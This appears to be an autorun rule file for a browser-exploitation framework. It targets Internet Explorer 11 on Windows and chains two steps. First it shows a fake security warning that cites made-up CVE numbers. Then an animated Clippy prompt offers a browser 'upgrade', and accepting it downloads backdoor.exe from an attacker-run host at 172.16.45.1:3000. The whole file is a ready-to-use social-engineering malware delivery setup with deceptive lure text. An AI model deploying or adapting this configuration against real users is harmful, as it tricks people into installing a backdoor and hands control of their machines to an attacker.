Path: blob/master/arerules/ie_win_fakenotification-clippy.json
1146 views
{1"name": "Ie Fake Notification + Clippy",2"author": "antisnatchor",3"browser": "IE",4"browser_version": "== 11",5"os": "Windows",6"os_version": ">= 7",7"modules": [8{9"name": "fake_notification",10"condition": null,11"options": {12"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."13}14}15,{16"name": "clippy",17"condition": null,18"options": {19"clippydir": "http://172.16.45.1:3000/clippy/",20"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",21"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",22"respawntime":"5000",23"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"24}25}26],27"execution_order": [0,1],28"execution_delay": [0,2000],29"chain_mode": "sequential"30}313233